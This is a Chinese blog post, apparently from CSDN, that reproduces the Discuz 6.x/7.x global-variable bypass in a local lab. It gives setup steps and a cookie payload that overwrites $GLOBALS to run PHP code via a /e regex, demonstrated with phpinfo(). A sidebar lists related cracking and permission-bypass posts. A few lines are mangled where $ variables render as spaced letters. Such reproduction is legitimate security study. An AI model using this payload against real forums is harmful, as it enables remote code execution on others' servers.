Discuz 6.x 7.x 全局变量防御绕过导致代码执行漏洞复现(超级详细)

最新推荐文章于 2024-04-20 16:11:19 发布
最新推荐文章于 2024-04-20 16:11:19 发布
阅读量718 收藏 1
点赞数 1
分类专栏: 漏洞复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45819911/article/details/107360781
版权

Discuz 6.x 7.x 全局变量防御绕过导致代码执行漏洞复现

闲谈:

其实自己做个不少漏洞复现,但是一直没好意思发,后来我发现了,不发出来我写他干嘛?(反正也没人看)

0x00 漏洞概述:

由于php5.3.x版本里php.ini的设置里request_order默认值为GP,导致 R E Q U E S T 中 不 再 包 含 _REQUEST中不再包含 REQUEST_COOKIE,我们通过在Cookie中传入$GLOBALS来覆盖全局变量,造成代码执行漏洞。

0x01 前置条件:

php版本:php5.3.x php5.6.x
(经测试php5.2.x php7 均复现失败)

0x02 影响版本:

Discuz 6.x
Discuz 7.x

0x03 环境搭建:

靶机:Windows10专业版1903 phpstudy_pro php5.6.9nts Mysql5.7.26 Apache2.4.39 UCenter1.5.0 Discuz7.2
攻击机:kali2020 burp 火狐浏览器

环境搭建:
安装UCenter1.5.0:
将下载的UCenter1.5.0压缩包中得upload文件夹解压到网站根目录下,访问127.0.0.1/UCenter_1.5.0_SC_UTF8/upload/install,安装步骤如图0-图3所示:
在这里插入图片描述
图0
在这里插入图片描述
图1

在这里插入图片描述
图2
在这里插入图片描述
图3

安装Discuz7.2:
将下载的Discuz7.2压缩包中得upload文件夹解压到网站根目录下,访问127.0.0.1/Discuz7.2/upload/install ,安装步骤如图4-图7所示:
在这里插入图片描述
图4
在这里插入图片描述
图5
在这里插入图片描述
图6
在这里插入图片描述
图7
数据库信息必须是已经存在的,安装完成。

0x04 漏洞利用:
访问一个已经存在的帖子,用burp抓包,并且在cookie中增加GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo(); 如图8所示:
在这里插入图片描述
图8

返回结果如下图9:
在这里插入图片描述
图9
可见执行成功。

附录:

1:127.0.0.1/Discuz7.2/upload/install 页面空白,无法出现安装引导:
打开config.inc.php文件,将 d b u s e r 的 值 均 设 置 为 r o o t , dbuser的值均设置为root, dbuserrootdbpw的值设为123456,$dbname设为root (phpstudy数据库名称,账号,密码)如图10:
在这里插入图片描述
图10

小小小小白1397654
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DZ论坛破解
03-13
DZ论坛破解工具,可以破解基本的DZ论坛的秘密
Discuz 7.x/6.x 全局变量防御绕过导致代码执行
EC_Carrot的博客
05-25 86
漏洞成因 由于php5.3.x版本里php.ini的设置里request_order默认值为GP,导致$_REQUEST中不再包含$_COOKIE,我们通过在Cookie中传入$GLOBALS来覆盖全局变量,造成代码执行漏洞漏洞复现 安装成功后,直接找一个已存在的帖子,向其发送数据包,并在Cookie中增加GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo(); 例
利用Vulnhub复现漏洞 - Discuz 7.x/6.x 全局变量防御绕过导致代码执行
JiangBuLiu的博客
06-28 872
Discuz 7.x/6.x 全局变量防御绕过导致代码执行Vulnhub官方复现教程漏洞原理复现漏洞启动环境漏洞复现 Vulnhub官方复现教程 https://vulhub.org/#/environments/httpd/ssi-rce/ 漏洞原理 由于php5.3.x版本里php.ini的设置里request_order默认值为GP,导致$_REQUEST中不再包含$_COOKIE,我们通过...
Discuz防注入函数绕过方法分析及没用心的修复补丁
kendyhj9999的专栏
02-08 924
Discuz防注入函数绕过方法分析及没用心的修复补丁 http://www.freebuf.com/articles/web/8038.html Seay @ WEB安全 2013-03-25 共 16676 人围观,发现 8 个不明物体收藏该文 分析人:晴天小铸,Seay 分析时间:2013年03月20日 discuz介绍: Crossday Discuz! Boar
Discuz!论坛教程之发贴机用&#x开头的字符绕过关键字的解决方法
土著人宁巴的Discuz!专栏
05-10 5177
做论坛的人都知道发帖机的痛,现在的发帖机越来越猖狂了,经常有些站长会发现发帖机发布&#x开头的字符组成的内容来绕过后台设置的关键词过滤,那么我们如果解决这个问题呢? 针对这种现象,我们只要做如下简单设置即可。 后台->内容->词语过滤 在关键字里加 ;&#x 设置为审核或者禁止即可!
php绕过授权下载,Discuz附件下载权限绕过方法
weixin_28744423的博客
03-16 8708
越权下载含有“阅读权限”的插件、下载插件免扣币重现步骤:1、使用管理员账户,上传一个有高阅读权限的附件2、使用低权限的用户账户,下载附件,这个时候,Discuz会提示无权下载此时,浏览器中的附件地址形如forum.php?mod=attachment&aid=Nzg4fDQwNGQzYjMxfDEzODk2OTM4Mzh8MzEyNTR8MjY3Mw%3D%3D解码aid788|40...
Python 实现 Discuz论坛附件下载权限绕过漏洞
anshang4901的博客
07-01 3408
背景:最近压力有些大,想玩点游戏放松下,去Mac论坛下载,发现需要各种权限,于是蛋疼了。 所以,上网查了discuz! x3.1破解,手动替换,发现出现“链接已过期”。所以写了下面程序。 0.将下列代码复制到你的python IDE中。 1.先进网页,chrome浏览器查看网页元素,替换正则表达式内内容。 2.刷新你要下载的页面,右键复制下载链接 url = ‘你复制...
Discuz! 6.x/7.x 版本 前台任意代码执行漏洞
weixin_34119545的博客
01-03 304
一、漏洞原理: 由于php5.3.x版本里php.ini的设置里request_order默认值为GP,导致Discuz! 6.x/7.x 全局变量防御绕过漏洞。 include/global.func.php代码里: 01 function daddslashes($string, $force = 0) { ...
Discuz附件免金币积分下载c#编写无毒小巧
09-03
利用公开的Discuz下载提权漏洞对存在漏洞的论坛附件免积分金币下载附件,至今漏洞公开有一段时间了,部分论坛已经修复,所以并非所有论坛有效。此版本为自用所写。介于网上有人发布了一个工具但不能多次下载。这是我发的第二个版本,CSDN不能删除资源所以重新发,优化了代码体积更小,对连接作出了一些效验判断。避免因连接错误造成程序崩溃。
disucz 附件下载次数限制
11-11
discuz 附件下载次数限制,亲测真实可用,支持X3.1 3.2 3.3 3.4
Discuz x3.x模板 超级今日头条 手机版+PC版 GBK+UTF8.zip
12-03
Discuz x3.x模板 超级今日头条 手机版+PC版 GBK+UTF8
Discuz x3.x模板 迪恩 教育培训课程V7 GBK.zip
12-03
Discuz x3.x模板 迪恩 教育培训课程V7 GBK,程序包中内附详细的图文安装教程,下载后按照教程安装即可
Discuz3.x模板 灰白色风格 墨迹天气商业版UTF-8.zip
12-03
3.模板有很多细节都有体现,同时对官方模板文件结构和功能位置做了更为优化的设计处理,无论是在前端界面上还是在CCS代码优化上,兼容主流浏览器,ie8-ie10,谷歌火狐等。 4.模板对css3支持很多,用谷歌火狐以及ie9...
Discuz x3.x插件 签到点击广告领积分3.0.zip
11-16
Discuz x3.x插件 签到点击广告领积分3.0
Discuz x3.x模板 迪恩教育课程职业培训3 商业版 GBK.zip
12-03
模板 迪恩教育课程职业培训3 商业版 GBK,程序包中内附详细的图文安装教程,下载后按照教程安装即可
区块链安全应用----压力测试
2201_76041915的博客
04-17 994
有一个临时的解决方案,进入node_modules/@hyperledger/caliper-fisco-bcos目录,编辑该目录下的package.json文件,在"dependencies"中添加一项"secp256k1": “^3.8.0”,随后在该目录下执行npm i,更新完成后测试程序就能启动了。变动文件二:绿色为新增的代码,红色为源代码,需要删除。在部署完成后,可以通过。:用于指定需要测试的区块链平台,即受测系统(***S***ystem ***u***nder ***T***est);
浏览器原理 之 浏览器安全
最新发布
每天积累一点点
04-20 927
XSS 攻击,即跨站脚本攻击(Cross-Site Scripting),是一种常见的网络安全漏洞,它允许攻击者将恶意脚本注入到其他用户浏览的正常网页中。这些恶意脚本通常以 JavaScript 形式出现,并在用户的浏览器中执行执行的结果可以是窃取用户的cookies、会话令牌,或者对用户的账户进行其他恶意操作。存储型 XSS:恶意脚本被永久存储在目标服务器上,例如数据库、消息论坛、访客留言等,当其他用户请求数据时脚本被发送到用户的浏览器执行。反射型 XSS。
SERVER全局变量绕过
09-03
6.x/7.x 全局变量防御绕过导致命令执行](https://blog.csdn.net/weixin_42361708/article/details/115651776)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值